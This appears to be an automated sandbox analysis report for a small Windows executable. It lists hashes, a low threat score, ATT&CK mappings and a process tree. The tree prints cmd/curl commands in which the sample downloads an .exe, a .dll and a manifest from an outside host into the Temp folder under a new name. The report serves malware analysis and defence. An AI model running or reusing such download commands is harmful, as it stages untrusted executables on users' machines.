e71a997a58a54db0a879969fa1c3de5193b090bc59f3468f408785dbc0d9c7ac

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-en-20211208
submitted
15-01-2022 01:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ae6cdc2be9207880528e784fc54501ed.exe
Size

10KB
MD5

ae6cdc2be9207880528e784fc54501ed
SHA1

b4aff64bb1f0fee5d5c47c5f1275351c758b423a
SHA256

e71a997a58a54db0a879969fa1c3de5193b090bc59f3468f408785dbc0d9c7ac
SHA512

d610b732e7cd0442cfac93b83dda3f9f59a627af5e733e5b0ea795b3fdcf6d19c18656f8bdbe78ff1cf87fe2d0c00eb3e2a8cd37bf11954bec4dcd9b7eb00094

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

dw20.exe

pid process

1080 dw20.exe

pid	process
1080	dw20.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

ae6cdc2be9207880528e784fc54501ed.exe

description	pid	process	target process
PID 1584 wrote to memory of 1512	1584	ae6cdc2be9207880528e784fc54501ed.exe	cmd.exe
PID 1584 wrote to memory of 1512	1584	ae6cdc2be9207880528e784fc54501ed.exe	cmd.exe
PID 1584 wrote to memory of 1512	1584	ae6cdc2be9207880528e784fc54501ed.exe	cmd.exe
PID 1584 wrote to memory of 516	1584	ae6cdc2be9207880528e784fc54501ed.exe	cmd.exe
PID 1584 wrote to memory of 516	1584	ae6cdc2be9207880528e784fc54501ed.exe	cmd.exe
PID 1584 wrote to memory of 516	1584	ae6cdc2be9207880528e784fc54501ed.exe	cmd.exe
PID 1584 wrote to memory of 716	1584	ae6cdc2be9207880528e784fc54501ed.exe	cmd.exe
PID 1584 wrote to memory of 716	1584	ae6cdc2be9207880528e784fc54501ed.exe	cmd.exe
PID 1584 wrote to memory of 716	1584	ae6cdc2be9207880528e784fc54501ed.exe	cmd.exe
PID 1584 wrote to memory of 1080	1584	ae6cdc2be9207880528e784fc54501ed.exe	dw20.exe
PID 1584 wrote to memory of 1080	1584	ae6cdc2be9207880528e784fc54501ed.exe	dw20.exe
PID 1584 wrote to memory of 1080	1584	ae6cdc2be9207880528e784fc54501ed.exe	dw20.exe

C:\Users\Admin\AppData\Local\Temp\ae6cdc2be9207880528e784fc54501ed.exe
"C:\Users\Admin\AppData\Local\Temp\ae6cdc2be9207880528e784fc54501ed.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\system32\cmd.exe
"cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\Admin\AppData\Local\Temp\flexteam.exe.manifest"
2⤵
PID:1512

C:\Windows\system32\cmd.exe
"cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\Admin\AppData\Local\Temp\flexteam.dll"
2⤵
PID:516

C:\Windows\system32\cmd.exe
"cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\Admin\AppData\Local\Temp\flexteam.exe"
2⤵
PID:716

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 564
2⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1080

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/516-55-0x0000000000000000-mapping.dmp

Download
memory/716-57-0x0000000000000000-mapping.dmp

Download
memory/1080-59-0x0000000000000000-mapping.dmp

Download
memory/1080-61-0x00000000004A0000-0x00000000004A1000-memory.dmp

Filesize
4KB

Download
memory/1512-54-0x0000000000000000-mapping.dmp

Download
memory/1584-56-0x0000000002000000-0x0000000002002000-memory.dmp

Filesize
8KB

Download
memory/1584-58-0x000007FEFB531000-0x000007FEFB533000-memory.dmp

Filesize
8KB

Download